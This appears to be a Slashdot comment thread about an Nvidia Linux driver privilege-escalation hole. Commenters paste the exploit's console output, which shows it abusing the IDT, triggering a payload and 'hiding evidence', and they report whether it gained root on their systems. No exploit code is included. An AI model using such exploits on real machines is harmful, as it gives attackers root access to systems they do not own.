Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500658] Call Trace:

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500675] Code: Bad RIP value.

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500684] CR2: ffffffff81a00000

Re:works here (0)

Anonymous Coward | about 2 years ago | (#40846277)

Does it open any sort of "hole" that "bad guys" could use remotely, or they need to have physical control of the computer to use this exploit?

Re:works here (0)

Anonymous Coward | about 2 years ago | (#40846993)

generically speaking this is local only, they would have to have a shell account to use the code as is. of course, the guts of it could be included in any software you might download and software could be running as your user id, escalate itself to root privs, and then open itself to outside world. This is why trust is important with regards to repositories and the like.

Consider how many places on the net say to do task xyz, add this line to your apt-sources and then install via apt-get install. How well do you trust those repositories that are not hugely community reviewed? // captcha is mischief, hah

Re:works here (1)

TuxThePenguin2205 (1031140) | about 2 years ago | (#40846343)

Kinda works for me. Got root on a Gentoo box. Then everything stopped working within a couple of seconds: any programs started were auto-killed and all networking stopped dead. I saw a kernel oops in the kernel ring log. A reboot was required to do anything useful.

Linux mysystem 3.2.12-gentoo #1 SMP PREEMPT Mon Mar 26 12:55:47 BST 2012 x86_64 Intel(R) Core(TM) i7 CPU 970 @ 3.20GHz GenuineIntel GNU/Linux
NVRM version: NVIDIA UNIX x86_64 Kernel Module 295.59 Wed Jun 6 21:19:40 PDT 2012

Re:works here (1)

MikeBabcock (65886) | about 2 years ago | (#40847059)

One wonders if its possible to block this with SELinux.

Re:works here (2, Insightful)

fnj (64210) | about 2 years ago | (#40847251)

Why not; SELinux certainly has no problem blocking anything useful from working.

Re:works here (1)

digitalaudiorock (1130835) | about 2 years ago | (#40847077)

Didn't work on either 32 bit gentoo machines of mine. One with an old card that requires nvidia-drivers-96.43.20: ./nvid-root
[*] IDT offset at 0xc13fe000
[*] Abusing nVidia...
(just ended there)...and one with nvidia-drivers-295.49: ./nvid-root
[*] IDT offset at 0xc13d4000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc13d46e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffb (-5)
[*] Failed to get root.

Re:works here (1)

Tapewolf (1639955) | about 2 years ago | (#40847279)

Worked on mine with a custom 3.4 kernel (on AMD64) and with Nvidia 304.22. I'm going to upgrade to 3.5 and see if that makes any difference. Unsurprisingly, but annoyingly, it's knackered VGA mode so I can't switch back to the VTs.

Again? (0)

Anonymous Coward | about 2 years ago | (#40845395)

This isn't the first time that the Nvidia driver has had serious security vulnerabilities. It also happened in 2006:

http://phoronix.com/scan.php?page=news_item&px=Mjk5Nw [phoronix.com]

Re:Again? (1)

Anonymous Coward | about 2 years ago | (#40845665)

You mean six years ago they also had a vulnerability? In the modern world we live, that sounds like a ringing fucking endorsement. With companies like Microsoft, you need only say something like, "last Tuesday." Doesn't sound like a bad track record to me.

Re:Again? (2)

TheRaven64 (641858) | about 2 years ago | (#40845817)

They have security vulnerabilities fairly regularly. Ones that are remotely exploitable are rarer, but the cited one from the grandparent was first known in 2004, not fixed until 2006, and allowed anyone who could make you display an image (e.g. in a web page) to run arbitrary code in your kernel. It gets cited a lot because it's a perfect case study in stunningly incompetent security.

Re:Again? (0)

Anonymous Coward | about 2 years ago | (#40847313)

the cited one from the grandparent was first known in 2004, not fixed until 2006

Not true. The advisory writer confused an X server bug (also exploitable!) from 2004 with the nVidia one from 2006. http://nvidia.custhelp.com/app/answers/detail/a_id/1971/~/linux---how-does-the-rapid7-advisory-r7-0025-affect-the-nvidia-unix-driver [custhelp.com]

and allowed someone to anyone who could make you display an image (e.g. in a web page) run arbitrary code in your kernel. It gets cited a lot because it's a perfect case study in stunningly incompetent security.

Also not true. It required carefully-crafted fonts and let you run code in the X server (which usually runs as root, but doesn't have to).

good thing (1)

slashmydots (2189826) | about 2 years ago | (#40845599)

Good thing all the outside the box type virus writers are busy writing malware for Macs so they don't have time to focus on Linux lol.

meh (4, Interesting)

ThorGod (456163) | about 2 years ago | (#40845659)

Not too long ago Intel had a firmware exploit in their processors.

I still appreciate the effort Nvidia's made to support their cards on OSes such as Linux and BSD over the years. I'll still only EVER buy Nvidia cards because of their driver support.

Here's hoping they keep trucking along at it, even with what Linus said and now this.

Re:meh (1)

John Hasler (414242) | about 2 years ago | (#40845763)

I bought one Nvidia card because of their wonderful Linux support. I'll never buy another.

Re:meh (0)

Anonymous Coward | about 2 years ago | (#40846579)

I never bought a graphics card. Should I have?

Re:meh (1)

gman003 (1693318) | about 2 years ago | (#40847221)

Even if you've never bought a discrete card, you've used one, integrated either onto the motherboard, into the northbridge, or on the processor itself.

One of my earliest computers had an ATI Rage 3D right on the motherboard. Later, I used one with an nVidia chipset, which had (I believe) a 7000-series GPU integrated with the northbridge. My current laptop has an Intel GPU right on the processor (it also has a discrete nVidia card). Unless your computer literally does not have any video capability, it has some sort of graphics "system". Quite possibly an Nvidia chip (they're the largest, followed by AMD, Intel, PowerVR, and a few others (I think Matrox is still around)).

Re:meh (0)

Anonymous Coward | about 2 years ago | (#40847413)

No. Discrete graphics cards are for bird brains.

Re:meh (1)

interval1066 (668936) | about 2 years ago | (#40846519)

Um... Intel...? Just sayin', nVidia isn't your only choice for Linux support.

Re:meh (1)

MikeBabcock (65886) | about 2 years ago | (#40847063)

Okay, Intel makes drivers. What they don't make is video cards that work worth a damn.

He meant to say, "of the video cards that can play games with decent frame rates, NVidia has the best drivers on Linux."

Re:meh (0)

Anonymous Coward | about 2 years ago | (#40847457)

Go Intel. I'll never return to nVidia or ATI. Intel's graphics are actually comparable now to the low-end nVidia. Plus Intel's cards support video. It's not all better in nVidia land. Intel's drivers are completely free, unlike nVidia and ATI, who work against free software. AMD only releases a partial driver. It doesn't even partially work without the non-free component.

privilege escalation hole? (1)

paxprobellum (2521464) | about 2 years ago | (#40845725)

"privilege escalation hole" sounds like something after "friends with benefits". Just saying.

Won't work on 64 bit (0)

Anonymous Coward | about 2 years ago | (#40845929)

[*] IDT offset at 0xffffffff81962000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81962dc0)
[*] Enhancing gate entry...
[ ] Failed!

So who here runs a secure X11 with any driver? (1)

Anonymous Coward | about 2 years ago | (#40845945)

X11 has NEVER been secure; it's ridiculous to try and point the finger at Nvidia, and this is why they have not cared for a month. It's a favorite interview question I use on *NIX applicants: "So tell me, how do you secure X11?" Usually this question gets some laughs and is a nice way to break the ice. Seriously though, what is the alternative here? The Ford Escape catches on fire, but would you turn down a Ford GT? Probably not, and the same goes for graphics acceleration: are you going to turn down that fire-breathing graphics card in your hot little hands? Probably not. If someone gets into your X11 box at that level there is a problem with your network, not the Linux box.

Re:So who here runs a secure X11 with any driver? (1)

PenquinCoder (1431871) | about 2 years ago | (#40847383)

"So tell me, how do you secure X11?"

Get rid of it. Use Wayland.

One of many (4, Insightful)

jandrese (485) | about 2 years ago | (#40845991)

The graphics driver is both monstrously large and operates at a very low level; there are going to be tons and tons of security problems with it when people start seriously looking at it. As John Carmack put it: "I agree with Microsoft's assessment that WebGL is a severe security risk. The gfx driver culture is not the culture of security."

Only a month notice? (1)

gr8_phk (621180) | about 2 years ago | (#40846529)

It appears that this has been known to Nvidia for at least a month.

At normal software companies this would probably go through a process like:
1) Confirmation of the problem
2) Determine severity
3) Assign a release to fix it by
4) Have someone fix it
5) Verify the fix
6) Ship it with the next release
In addition, one may want to look around for related problems and fix those too. Since it is a security issue, I would hope that a fix makes it into the next driver release AFTER the one that is in process. Or perhaps hurried into the one that is in process if it won't delay too long. I don't think a month is really that long for a company that size to go without a fix. Upon reading the summary I honestly thought the last word was going to be "year" not "month", in which case a fix would be long overdue.

Is this vulnerability remotely exploitable? (0)

Anonymous Coward | about 2 years ago | (#40846807)

I guess this is the most important question, otherwise users shouldn't worry about it. Does anybody know?
